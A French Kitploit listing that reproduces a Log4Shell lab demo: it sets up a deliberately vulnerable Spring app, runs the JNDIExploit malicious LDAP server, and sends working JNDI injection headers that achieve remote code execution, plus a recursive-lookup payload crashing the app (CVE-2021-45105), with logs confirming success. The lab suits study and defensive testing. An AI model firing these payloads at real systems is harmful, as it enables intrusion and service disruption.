Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell-CVE-2021-44228-Demo — Démo Log4Shell avec AWS | Kitploit
Outils/GitHubGitHub/baboopan/log4shell-cve-2021-44228-demo
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesLabs et Pratique
GitHub
baboopan/log4shell-cve-2021-44228-demo

Log4Shell-CVE-2021-44228-Demo

Démo Log4Shell avec AWS

Voir le dépôt
212il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démo Log4Shell (CVE-2021-44228)

demo-scenarios

Configuration de l'environnement

Client

  • N'importe où avec la capacité d'accéder au serveur HTTP via la ligne de commande curl

Application vulnérable via le serveur HTTP avec log4j

  • Instance EC2 Amazon Linux 2 (basé sur x86) / Machine virtuelle CentOS Azure
root@kitploit:~
$ yum install docker -y
$ systemctl enable docker
$ systemctl start docker
$ docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
  • Sortie de la console SSH spring-web-server

Exploit JNDI en tant que serveur LDAP malveillant

  • Instance EC2 Amazon Linux 2 (basé sur x86)
root@kitploit:~
$ yum install java-11-amazon-corretto.x86_64 -y
# Azure for java-1.7.0-openjdk-1.7.0.261-2.6.22.2.el7_8.x86_64
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indicate the service endpoint as the EC2 private ip from metadata
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -s http://169.254.169.254/latest/meta-data/local-ipv4) -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • Machine virtuelle CentOS Azure
root@kitploit:~
$ wget https://corretto.aws/downloads/latest/amazon-corretto-11-x64-linux-jdk.rpm
$ yum install amazon-corretto-11-x64-linux-jdk.rpm -y
$ wget https://github.com/Mr-xn/JNDIExploit-1/releases/download/v1.2/JNDIExploit.v1.2.zip
$ unzip JNDIExploit.v1.2.zip
# Indicate the service endpoint as the private ip from metadata
$ java -jar JNDIExploit-1.2-SNAPSHOT.jar -i $(curl -sH Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/?api-version=2021-02-01" | awk -F '[:,"]' '{print $5}') -p 8888
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8888...
  • Sortie de la console SSH jndiexploit

Déroulement de l'exploitation

Comportement normal

Le serveur renverra Hello World! lorsque le client envoie la requête correctement avec l'en-tête X-Api-Version. Sinon, le client obtiendra l'erreur HTTP 400 en tant que mauvaise requête.

  • Client
root@kitploit:~
$ curl SERVER_IP:8080 -H 'X-Api-Version: 1.1'
Hello, world!
$ curl SERVER_IP:8080
{"timestamp":"2021-12-22T02:44:43.103+00:00","status":400,"error":"Bad Request","path":"/"}

client-requests-normal

  • Journal du serveur
root@kitploit:~
# Requests with the header properly
2021-12-22 02:44:40.920  INFO 1 --- [nio-8080-exec-3] HelloWorld                               : Received a request for API version 1
It's Hello from System.out.
# Reqeusts without the right input
2021-12-22 02:44:43.102  WARN 1 --- [nio-8080-exec-5] .w.s.m.s.DefaultHandlerExceptionResolver : Resolved [org.springframework.web.bind.MissingRequestHeaderException: Required request header 'X-Api-Version' for method parameter type String is not present]

server-requests-normal

Attaque par injection / CVE-2021-44228

Maintenant, nous allons envoyer la requête d'injection avec l'en-tête 'X-Api-Version: ${jndi:ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}', ce qui déclenchera la CVE-2021-44228 pour exécuter la recherche JNDI afin d'accéder via ldap et d'effectuer une RCE.

Le dG91Y2ggL3RtcC9wd25lZAo=} est encodé en base64 à partir de la commande linux touch /tmp/pwned. Une fois la RCE réalisée, cela créera un fichier dans l'application vulnérable.

Vous pouvez également modifier le comportement en remplaçant la chaîne base64 par https://www.base64encode.org/.

  • Client
root@kitploit:~
# Send the request with injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Hello, world!

client-requests-injection

  • Journal du serveur
root@kitploit:~
2021-12-22 03:04:07,042 http-nio-8080-exec-6 WARN Error looking up JNDI resource [ldap://10.0.1.164:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: ExploitxM5KqZop9U cannot be cast to javax.naming.spi.ObjectFactory]; remaining name '"Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo="'
...
...
# Receive the injection and redirect it to the JNDI Exploit Server we indicated in the request
2021-12-22 03:04:06.567  INFO 1 --- [nio-8080-exec-6] HelloWorld                               : Received a request for API version ${jndi:ldap://JNDI_EXPLOIT_IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

server-exploit

  • Exploit JNDI
root@kitploit:~
# Get the LDAP Lookup from server vulnerable app
[+] Received LDAP Query: Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
[+] Paylaod: command
[+] Command: touch /tmp/pwned
# Send back the encoded string back to vulnerable app, let the app execute the command in base64
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo= redirecting to http://10.0.1.164:8888/ExploitxM5KqZop9U.class
[+] New HTTP Request From /10.0.1.200:33250  /ExploitxM5KqZop9U.class
[+] Receive ClassRequest: ExploitxM5KqZop9U.class
[+] Response Code: 200

jndi-exploit-ldap

  • Valider le résultat de la RCE dans l'application vulnérable sur le serveur
root@kitploit:~
# Get the Container ID of vulnerable app in Server
$ docker ps -a
CONTAINER ID   IMAGE            COMMAND                  CREATED             STATUS             PORTS                                       NAMES
a4b14c4adb6c   vulnerable-app   "java -jar /app/spri…"   About an hour ago   Up About an hour   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   vulnerable-app
# List the /tmp folder before the injection
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780
# Confirm the RCE achieved bt injection request
$ docker exec -i -t a4b14c4adb6c ls -l /tmp/
total 0
drwxr-xr-x    2 root     root            15 Dec 22 02:34 hsperfdata_root
-rw-r--r--    1 root     root             0 Dec 22 03:04 pwned # RCE achieved
drwx------    2 root     root             6 Dec 22 01:34 tomcat-docbase.8080.228050961485794229
drwx------    3 root     root            18 Dec 22 01:34 tomcat.8080.4816494392465116780

server-app-pwned

Attaque par injection / CVE-2021-45105

Les versions de Log4j2 de 2.0-alpha1 à 2.16.0, à l'exception de la 2.12.3, ne protégeaient pas contre la récursion non contrôlée due aux références auto-référentielles. Lorsque la configuration de journalisation utilise un Pattern Layout non défaut avec une recherche contextuelle, les attaquants ayant le contrôle sur les données d'entrée du Thread Context Map (MDC) peuvent concevoir des données malveillantes contenant une recherche récursive, entraînant une StackOverflowError qui terminera le processus. - Description de CVE-2021-45105, Apache

Maintenant, nous pouvons saisir le Thread Context Map avec la classe StrSubstitutor ${${::-${::-$${::-j}}}} pour faire planter l'application en raison d'une erreur de récursion infinie.

  • Client
root@kitploit:~
# Send the request with injection
$ curl SERVER_IP:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'
Hello, world!

client-requests-45105

  • Journal du serveur
root@kitploit:~
2021-12-22 03:42:38,614 http-nio-8080-exec-2 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-$}}: :
...
...
    at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)

server-error-infinite-loop

Référence

  • christophetd/log4shell-vulnerable-app
  • Mr-xn/JNDIExploit
Télécharger l’outil